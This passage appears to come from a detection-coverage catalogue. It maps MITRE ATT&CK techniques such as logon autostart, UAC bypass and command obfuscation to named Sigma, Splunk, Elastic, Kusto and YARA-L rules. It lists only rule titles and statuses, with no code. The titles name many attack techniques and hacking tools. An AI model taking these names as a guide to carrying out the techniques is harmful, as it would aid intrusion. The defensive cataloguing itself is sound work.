- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Suspicious Activity Using SeCEdit test
Boot or Logon Autostart Execution: Time Providers T1547.003 3 rules
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Elastic Potential Persistence via Time Provider Modification production
- Splunk Time Provider Persistence Registry production
Boot or Logon Autostart Execution: Winlogon Helper DLL T1547.004 7 rules
- Elastic Persistence via WMI Standard Registry Provider production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
Boot or Logon Autostart Execution: Security Support Provider T1547.005 5 rules
- Elastic Installation of Security Support Provider production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Elastic Suspicious Module Loaded by LSASS production
- Splunk Windows Security Support Provider Reg Query production
Boot or Logon Autostart Execution: Kernel Modules and Extensions T1547.006 2 rules
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
Boot or Logon Autostart Execution: LSASS Driver T1547.008 4 rules
- Sigma DLL Load via LSASS test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
Boot or Logon Autostart Execution: Shortcut Modification T1547.009 10 rules
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma Desktop.INI Created by Uncommon Process test
- Sigma New Custom Shim Database Created test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma Windows Network Access Suspicious desktop.ini Action test
Boot or Logon Autostart Execution: Port Monitors T1547.010 11 rules
- Sigma Add Port Monitor Persistence in Registry test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Splunk Monitor Registry Keys for Print Monitors production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Boot or Logon Autostart Execution: Print Processors T1547.012 8 rules
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
Boot or Logon Autostart Execution: Active Setup T1547.014 4 rules
- Splunk Active Setup Registry Autostart production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Uncommon Registry Persistence Change production
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
Abuse Elevation Control Mechanism T1548 120 rules
- Sigma Abused Debug Privilege by Arbitrary Parent Processes test
- Splunk Allow Operation with Consent Admin production
- Sigma Always Install Elevated MSI Spawned Cmd And Powershell test
- Sigma Always Install Elevated Windows Installer test
- Sigma Bypass UAC Using DelegateExecute test
- Sigma Bypass UAC Using SilentCleanup Task test
- Sigma Bypass UAC via CMSTP test
- Elastic Bypass UAC via Event Viewer production
- Sigma Bypass UAC via Fodhelper.exe test
- Sigma Bypass UAC via WSReset.exe test
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Sigma COM Hijack via Sdclt test
- Splunk ComputerDefaults UAC Bypass (PowerShell)
- Splunk ComputerDefaults UAC Bypass (Sysmon)
- Splunk ComputerDefaults UAC Bypass (Windows Event Log)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (PowerShell)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Sysmon)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Windows Event Log)
- Sigma Credential Dumping Attempt Via Svchost test
- Splunk Disable UAC Remote Restriction production
- Splunk Disabling Remote User Account Control production
- Elastic Disabling User Account Control via Registry Modification production
- Splunk EnableLUA Registry Value Modified (PowerShell)
- Splunk EnableLUA Registry Value Modified (Sysmon)
- Splunk EnableLUA Registry Value Modified (Windows Event Log)
- Splunk Eventvwr UAC Bypass production
- Sigma Explorer NOUACCHECK Flag test
- Splunk FodHelper UAC Bypass production
- Sigma Function Call From Undocumented COM Interface EditionUpgradeManager test
- Sigma HackTool - Empire PowerShell UAC Bypass stable
- Sigma HackTool - UACMe Akagi Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk Indirect Command Execution (Sysmon)
- Splunk Indirect Command Execution (Windows Event Log)
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk Mock System Directory - Windows (Sysmon)
- Splunk Mock System Directory - Windows (Windows Event Log)
- Splunk NET Profiler UAC bypass production
- Sigma Potential Exploitation of CVE-2025-5054 or CVE-2025-4598 experimental
- Kusto Potential Fodhelper UAC Bypass available
- Kusto Potential Fodhelper UAC Bypass (ASIM Version)
- Splunk Potential fodhelper UAC Bypass Attempt (PowerShell)
- Splunk Potential fodhelper UAC Bypass Attempt (Sysmon)
- Splunk Potential fodhelper UAC Bypass Attempt (Windows Event Log)
- Sigma Potential Privilege Escalation via Local Kerberos Relay over LDAP test
- Sigma Potential UAC Bypass Via Sdclt.EXE test
- Sigma Potentially Suspicious Event Viewer Child Process test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Web Access Feature Enabled Via DISM test
- Splunk PromptOnSecureDesktop Registry Value Modified (PowerShell)
- Splunk PromptOnSecureDesktop Registry Value Modified (Sysmon)
- Splunk PromptOnSecureDesktop Registry Value Modified (Windows Event Log)
- Sigma Regedit as Trusted Installer test
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma SCM Database Privileged Operation test
- Sigma Sdclt Child Processes test
- Splunk Sdclt UAC Bypass production
- Splunk Services Escalate Exe production
- Sigma Shell Open Registry Keys Manipulation test
- Splunk SilentCleanup UAC Bypass production
- Splunk SLUI RunAs Elevated production
- Splunk SLUI Spawning a Process production
- Sigma Sudo Privilege Escalation CVE-2019-14287 test
- Splunk Suspicious ComputerDefaults.exe Execution (Sysmon)
- Splunk Suspicious ComputerDefaults.exe Execution (Windows Event Log)
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma TrustedPath UAC Bypass Pattern test
- Sigma UAC Bypass Abusing Winsat Path Parsing - File test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Process test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Registry test
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Sigma UAC Bypass Tools Using ComputerDefaults test
- Sigma UAC Bypass Using .NET Code Profiler on MMC test
- Sigma UAC Bypass Using ChangePK and SLUI test
- Sigma UAC Bypass Using Consent and Comctl32 - File test
- Sigma UAC Bypass Using Consent and Comctl32 - Process test
- Sigma UAC Bypass Using Disk Cleanup test
- Sigma UAC Bypass Using DismHost test
- Sigma UAC Bypass Using IDiagnostic Profile test
- Sigma UAC Bypass Using IDiagnostic Profile - File test
- Sigma UAC Bypass Using IEInstal - File test
- Sigma UAC Bypass Using IEInstal - Process test
- Sigma UAC Bypass Using Iscsicpl - ImageLoad test
- Sigma UAC Bypass Using MSConfig Token Modification - File test
- Sigma UAC Bypass Using MSConfig Token Modification - Process test
- Sigma UAC Bypass Using NTFS Reparse Point - File test
- Sigma UAC Bypass Using NTFS Reparse Point - Process test
- Sigma UAC Bypass Using PkgMgr and DISM test
- Sigma UAC Bypass Using Windows Media Player - File test
- Sigma UAC Bypass Using Windows Media Player - Process test
- Sigma UAC Bypass Using Windows Media Player - Registry test
- Sigma UAC Bypass Using WOW64 Logger DLL Hijack test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma UAC Bypass via Event Viewer test
- Sigma UAC Bypass via ICMLuaUtil test
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
- Sigma UAC Bypass via Sdclt test
- Sigma UAC Bypass via Windows Firewall Snap-In Hijack test
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Sigma UAC Bypass Via Wsreset test
- Sigma UAC Bypass With Fake DLL test
- Sigma UAC Bypass WSReset test
- Sigma UAC Disabled stable
- Sigma UAC Notification Disabled test
- Sigma UAC Secure Desktop Prompt Disabled test
- Splunk Windows Bypass UAC via Pkgmgr Tool production
- Splunk Windows ComputerDefaults Spawning a Process production
- Splunk Windows DISM Install PowerShell Web Access production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Windows UAC Bypass Suspicious Child Process production
- Splunk Windows UAC Bypass Suspicious Escalation Behavior production
- Splunk WSReset UAC Bypass production
Abuse Elevation Control Mechanism: Bypass User Account Control T1548.002 104 rules
- Sigma Always Install Elevated MSI Spawned Cmd And Powershell test
- Sigma Always Install Elevated Windows Installer test
- Sigma Bypass UAC Using DelegateExecute test
- Sigma Bypass UAC Using SilentCleanup Task test
- Sigma Bypass UAC via CMSTP test
- Elastic Bypass UAC via Event Viewer production
- Sigma Bypass UAC via Fodhelper.exe test
- Sigma Bypass UAC via WSReset.exe test
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Splunk ComputerDefaults UAC Bypass (PowerShell)
- Splunk ComputerDefaults UAC Bypass (Sysmon)
- Splunk ComputerDefaults UAC Bypass (Windows Event Log)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (PowerShell)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Sysmon)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Windows Event Log)
- Splunk Disable UAC Remote Restriction production
- Splunk Disabling Remote User Account Control production
- Elastic Disabling User Account Control via Registry Modification production
- Splunk EnableLUA Registry Value Modified (PowerShell)
- Splunk EnableLUA Registry Value Modified (Sysmon)
- Splunk EnableLUA Registry Value Modified (Windows Event Log)
- Splunk Eventvwr UAC Bypass production
- Sigma Explorer NOUACCHECK Flag test
- Splunk FodHelper UAC Bypass production
- Sigma Function Call From Undocumented COM Interface EditionUpgradeManager test
- Sigma HackTool - Empire PowerShell UAC Bypass stable
- Sigma HackTool - UACMe Akagi Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk Mock System Directory - Windows (Sysmon)
- Splunk Mock System Directory - Windows (Windows Event Log)
- Splunk NET Profiler UAC bypass production
- Kusto Potential Fodhelper UAC Bypass available
- Kusto Potential Fodhelper UAC Bypass (ASIM Version)
- Splunk Potential fodhelper UAC Bypass Attempt (PowerShell)
- Splunk Potential fodhelper UAC Bypass Attempt (Sysmon)
- Splunk Potential fodhelper UAC Bypass Attempt (Windows Event Log)
- Sigma Potential UAC Bypass Via Sdclt.EXE test
- Sigma Potentially Suspicious Event Viewer Child Process test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Web Access Feature Enabled Via DISM test
- Splunk PromptOnSecureDesktop Registry Value Modified (PowerShell)
- Splunk PromptOnSecureDesktop Registry Value Modified (Sysmon)
- Splunk PromptOnSecureDesktop Registry Value Modified (Windows Event Log)
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Sdclt Child Processes test
- Splunk Sdclt UAC Bypass production
- Sigma Shell Open Registry Keys Manipulation test
- Splunk SilentCleanup UAC Bypass production
- Splunk SLUI RunAs Elevated production
- Splunk SLUI Spawning a Process production
- Splunk Suspicious ComputerDefaults.exe Execution (Sysmon)
- Splunk Suspicious ComputerDefaults.exe Execution (Windows Event Log)
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma TrustedPath UAC Bypass Pattern test
- Sigma UAC Bypass Abusing Winsat Path Parsing - File test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Process test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Registry test
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Sigma UAC Bypass Tools Using ComputerDefaults test
- Sigma UAC Bypass Using .NET Code Profiler on MMC test
- Sigma UAC Bypass Using ChangePK and SLUI test
- Sigma UAC Bypass Using Consent and Comctl32 - File test
- Sigma UAC Bypass Using Consent and Comctl32 - Process test
- Sigma UAC Bypass Using Disk Cleanup test
- Sigma UAC Bypass Using DismHost test
- Sigma UAC Bypass Using IDiagnostic Profile test
- Sigma UAC Bypass Using IDiagnostic Profile - File test
- Sigma UAC Bypass Using IEInstal - File test
- Sigma UAC Bypass Using IEInstal - Process test
- Sigma UAC Bypass Using Iscsicpl - ImageLoad test
- Sigma UAC Bypass Using MSConfig Token Modification - File test
- Sigma UAC Bypass Using MSConfig Token Modification - Process test
- Sigma UAC Bypass Using NTFS Reparse Point - File test
- Sigma UAC Bypass Using NTFS Reparse Point - Process test
- Sigma UAC Bypass Using PkgMgr and DISM test
- Sigma UAC Bypass Using Windows Media Player - File test
- Sigma UAC Bypass Using Windows Media Player - Process test
- Sigma UAC Bypass Using Windows Media Player - Registry test
- Sigma UAC Bypass Using WOW64 Logger DLL Hijack test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma UAC Bypass via Event Viewer test
- Sigma UAC Bypass via ICMLuaUtil test
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
- Sigma UAC Bypass via Sdclt test
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Sigma UAC Bypass Via Wsreset test
- Sigma UAC Bypass With Fake DLL test
- Sigma UAC Bypass WSReset test
- Sigma UAC Disabled stable
- Sigma UAC Notification Disabled test
- Sigma UAC Secure Desktop Prompt Disabled test
- Splunk Windows Bypass UAC via Pkgmgr Tool production
- Splunk Windows ComputerDefaults Spawning a Process production
- Splunk Windows DISM Install PowerShell Web Access production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows UAC Bypass Suspicious Child Process production
- Splunk Windows UAC Bypass Suspicious Escalation Behavior production
- Splunk WSReset UAC Bypass production
Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 1 rule
- Sigma Sudo Privilege Escalation CVE-2019-14287 test
Escape to Host T1611 2 rules
- Kusto Oracle suspicious command execution available
- Kusto SQL Server spawning suspicious child process
Stealth
Direct Volume Access T1006 3 rules
- Elastic NTDS Dump via Wbadmin production
- Sigma Potential Defense Evasion Via Raw Disk Access By Uncommon Tools test
- Elastic Symbolic Link to Shadow Copy Created production
Rootkit T1014 2 rules
- Splunk Windows Driver Load Non-Standard Path production
- Splunk Windows Drivers Loaded by Signature production
Obfuscated Files or Information T1027 200 rules
- Sigma Base64 Encoded PowerShell Command Detected test
- Kusto Base64 encoded Windows process command-lines available
- Kusto Base64 encoded Windows process command-lines (Normalized Process Events)
- Elastic Binary Content Copy via Cmd.exe production
- Sigma Certificate Exported Via Certutil.EXE test
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Splunk Certutil File Download (PowerShell)
- Splunk Certutil File Download (Sysmon)
- Splunk Certutil File Download (Windows Event Log)
- Splunk Certutil Obfuscate_Encode Files (EDR)
- Splunk Certutil Obfuscate_Encode Files (PowerShell)
- Splunk Certutil Obfuscate_Encode Files (Sysmon)
- Splunk Certutil Obfuscate_Encode Files (Windows Event Log)
- Splunk Command Line Homoglyphs - Windows (PowerShell)
- Splunk Command Line Homoglyphs - Windows (Sysmon)
- Splunk Command Line Homoglyphs - Windows (Windows Event Log)
- Elastic Command Obfuscation via Unicode Modifier Letters production
- Splunk Compressed File Execution (Windows Event Log)
- Sigma ConvertTo-SecureString Cmdlet Usage Via CommandLine test
- Splunk CSC Execution (EDR)
- Splunk CSC Execution (Windows Event Log)
- Splunk CSC Net On The Fly Compilation production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Splunk Curl Execution with Percent Encoded URL production
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Splunk DLL Concatenation (PowerShell)
- Splunk DLL Concatenation (Sysmon)
- Splunk DLL Concatenation (Windows Event Log)
- Sigma Dynamic .NET Compilation Via Csc.EXE test
- Sigma Dynamic .NET Compilation Via Csc.EXE - Hunting test
- Sigma Dynamic CSharp Compile Artefact test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Splunk Encoded Powershell Command (PowerShell)
- Splunk Encoded Powershell Command (Sysmon)
- Splunk Encoded Powershell Command (Windows Event Log)
- Sigma Encoded PowerShell payload deployed (PowerShell) experimental
- Sigma Encoded PowerShell payload deployed via process execution experimental
- Sigma Encoded PowerShell payload deployed via service experimental
- Sigma Failed Code Integrity Checks stable
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma File Decoded From Base64/Hex Via Certutil.EXE test
- Sigma File Encoded To Base64 Via Certutil.EXE test
- Sigma File In Suspicious Location Encoded To Base64 Via Certutil.EXE test
- Sigma Findstr Launching .lnk File test
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Invoke-Obfuscation CLIP+ Launcher test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation CLIP+ Launcher - Security test
- Sigma Invoke-Obfuscation CLIP+ Launcher - System test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - Security test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - System test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - Security test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - System test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - Security test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - System test
- Sigma Invoke-Obfuscation STDIN+ Launcher test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Powershell test
- Sigma Invoke-Obfuscation STDIN+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Security test
- Sigma Invoke-Obfuscation STDIN+ Launcher - System test
- Sigma Invoke-Obfuscation VAR+ Launcher test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation VAR+ Launcher - Security test
- Sigma Invoke-Obfuscation VAR+ Launcher - System test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System test
- Sigma Invoke-Obfuscation Via Stdin test
- Sigma Invoke-Obfuscation Via Stdin - Powershell test
- Sigma Invoke-Obfuscation Via Stdin - PowerShell Module test
- Sigma Invoke-Obfuscation Via Stdin - Security test
- Sigma Invoke-Obfuscation Via Stdin - System test
- Sigma Invoke-Obfuscation Via Use Clip test
- Sigma Invoke-Obfuscation Via Use Clip - Powershell test
- Sigma Invoke-Obfuscation Via Use Clip - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Clip - Security test
- Sigma Invoke-Obfuscation Via Use Clip - System test
- Sigma Invoke-Obfuscation Via Use MSHTA test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use MSHTA - Security test
- Sigma Invoke-Obfuscation Via Use MSHTA - System test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Rundll32 - Security test
- Sigma Invoke-Obfuscation Via Use Rundll32 - System test
- Splunk Malicious PowerShell Process - Encoded Command production
- Kusto NRT Base64 Encoded Windows Process Command-lines available
- Kusto NRT Process executed from binary hidden in Base64 encoded file available
- Sigma Obfuscated payload transfered via service name - Tchopper (command) experimental
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Splunk Obfuscated Powershell Techniques (PowerShell)
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Password Protected ZIP File Opened test
- Sigma Password Protected ZIP File Opened (Email Attachment) test
- Sigma Password Protected ZIP File Opened (Suspicious Filenames) test
- Sigma Ping Hex IP test
- Sigma Potential Application Whitelisting Bypass via Dnx.EXE test
- Sigma Potential CommandLine Obfuscation Using Unicode Characters test
- Sigma Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Emotet Activity stable
- Sigma Potential Encoded PowerShell Patterns In CommandLine test
- Sigma Potential Obfuscated Ordinal Call Via Rundll32 test
- Sigma Potential PowerShell Command Line Obfuscation test
- Sigma Potential PowerShell Obfuscation Using Alias Cmdlets test
- Sigma Potential PowerShell Obfuscation Using Character Join test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Sigma Potential PowerShell Obfuscation Via Reversed Commands test
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma Potential PowerShell Obfuscation Via WCHAR/CHAR test
- Sigma Potential Secure Deletion with SDelete test
- Sigma Potential Suspicious Execution From GUID Like Folder Names test
- Sigma Potential Winnti Dropper Activity test
- Sigma Potentially Suspicious Long Filename Pattern - Linux experimental
- Sigma PowerShell Base64 Encoded Invoke Keyword test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Sigma PowerShell Base64 Encoded WMI Classes test
- Splunk PowerShell CreateDecryptor (PowerShell)
- Splunk PowerShell CreateDecryptor (Sysmon)
- Splunk PowerShell CreateDecryptor (Windows Event Log)
- Splunk Powershell Creating Thread Mutex production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Enable SMB1Protocol Feature production
- Splunk Powershell Fileless Script Contains Base64 Encoded Content production
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Sigma Powershell Token Obfuscation - Powershell test
- Sigma Powershell Token Obfuscation - Process Creation test
- Splunk PowerShell WebRequest Using Memory Stream production
- Kusto Process Creation with Suspicious CommandLine Arguments available
- Kusto Process executed from binary hidden in Base64 encoded file available
- Sigma PUA - DefenderCheck Execution test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
- Sigma Python Image Load By Non-Python Process test
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Renamed AutoIt Execution test
- Elastic Suspicious .NET Code Compilation production
- Splunk Suspicious csc.exe Source File Folder (Sysmon)
- Splunk Suspicious csc.exe Source File Folder (Windows Event Log)
- Sigma Suspicious Download Via Certutil.EXE test
- YARA-L Suspicious Download Via Certutil.EXE
- Sigma Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call test
- Elastic Suspicious Execution with NodeJS production
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious File Downloaded From Direct IP Via Certutil.EXE test
- Sigma Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE test
- YARA-L Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
- Sigma Suspicious File Encoded To Base64 Via Certutil.EXE test
- Sigma Suspicious Get-Variable.exe Creation test
- Elastic Suspicious HTML File Creation production
- Elastic Suspicious JavaScript Execution via Deno production
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
- Sigma Suspicious SYSTEM User Process Creation test
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious XOR Encoded PowerShell Command test
- Kusto TEARDROP memory-only dropper available
- Sigma Turla Group Commands May 2020 test
- Sigma Visual Basic Command Line Compiler Usage test
- Splunk Wermgr Process Create Executable File production
- Splunk Windows Command Obfuscation with Environment Variable Substrings production
- Splunk Windows Njrat Fileless Storage via Registry production
- Splunk Windows Obfuscated Files or Information via RAR SFX production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
- Splunk Windows Registry Payload Injection production
- Splunk Windows Snake Malware File Modification Crmlog production
- Splunk Windows TinyCC Shellcode Execution production
Obfuscated Files or Information: Binary Padding T1027.001 4 rules
- Splunk DLL Concatenation (PowerShell)
- Splunk DLL Concatenation (Sysmon)
- Splunk DLL Concatenation (Windows Event Log)
- Sigma Failed Code Integrity Checks stable
Obfuscated Files or Information: Software Packing T1027.002 1 rule
- Sigma Python Image Load By Non-Python Process test
Obfuscated Files or Information: Steganography T1027.003 1 rule
- Sigma Findstr Launching .lnk File test
Obfuscated Files or Information: Compile After Delivery T1027.004 12 rules
- Splunk CSC Execution (EDR)
- Splunk CSC Execution (Windows Event Log)
- Splunk CSC Net On The Fly Compilation production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Dynamic .NET Compilation Via Csc.EXE test
- Sigma Dynamic .NET Compilation Via Csc.EXE - Hunting test
- Sigma Dynamic CSharp Compile Artefact test
- Sigma Potential Application Whitelisting Bypass via Dnx.EXE test
- Elastic Suspicious .NET Code Compilation production
- Splunk Suspicious csc.exe Source File Folder (Sysmon)
- Splunk Suspicious csc.exe Source File Folder (Windows Event Log)
- Sigma Visual Basic Command Line Compiler Usage test
Obfuscated Files or Information: Indicator Removal from Tools T1027.005 6 rules
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Sigma Potential Secure Deletion with SDelete test
- Splunk Powershell Creating Thread Mutex production
- Splunk Powershell Enable SMB1Protocol Feature production
- Sigma PUA - DefenderCheck Execution test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
Obfuscated Files or Information: HTML Smuggling T1027.006 1 rule
- Elastic Suspicious HTML File Creation production
Obfuscated Files or Information: Embedded Payloads T1027.009 2 rules
- Sigma Powershell Token Obfuscation - Powershell test
- Sigma Powershell Token Obfuscation - Process Creation test
Obfuscated Files or Information: Command Obfuscation T1027.010 30 rules
- Splunk Command Line Homoglyphs - Windows (PowerShell)
- Splunk Command Line Homoglyphs - Windows (Sysmon)
- Splunk Command Line Homoglyphs - Windows (Windows Event Log)
- Elastic Command Obfuscation via Unicode Modifier Letters production
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Obfuscated Ordinal Call Via Rundll32 test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
